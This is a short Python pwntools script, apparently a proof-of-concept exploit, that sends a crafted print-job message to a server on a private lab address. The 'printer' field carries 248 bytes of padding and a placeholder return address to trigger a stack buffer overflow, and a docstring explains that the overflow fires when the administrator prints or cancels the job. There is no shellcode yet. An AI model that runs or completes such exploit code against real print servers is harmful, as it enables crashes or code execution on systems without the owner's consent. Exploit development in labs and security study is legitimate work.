#!/usr/bin/python3
from pwn import *

SERVER_IP = "192.168.56.101"
SERVER_PORT = 10000

#PAYLOAD = b"A"*248  # OFFSET
PAYLOAD = b"IMPRESORA"  # OFFSET
PAYLOAD += b"A"*(248-len("IMPRESORA"))  # OFFSET
PAYLOAD += b"B"*4       # RET ADDRESS

def bof(ip, port):
    """
    A client can create print jobs on the server by sending it the string
    "MI_ID: <id> <status> <printed_pages> <total_pages> <size> <document>
    <printer> <user> <pc>". In the "printer" field there is a stack
    overflow if a string longer than 248 bytes is sent. The overflow occurs
    when the server administrator tries to print or cancel the malicious print.
    """
    s = remote(ip, port)
    s.send(b"MI_ID: 1 pendiente 0 1 1 documento "+PAYLOAD+b" usuario-01 pc-01\r\n")


if __name__ == "__main__":
    bof(SERVER_IP, SERVER_PORT)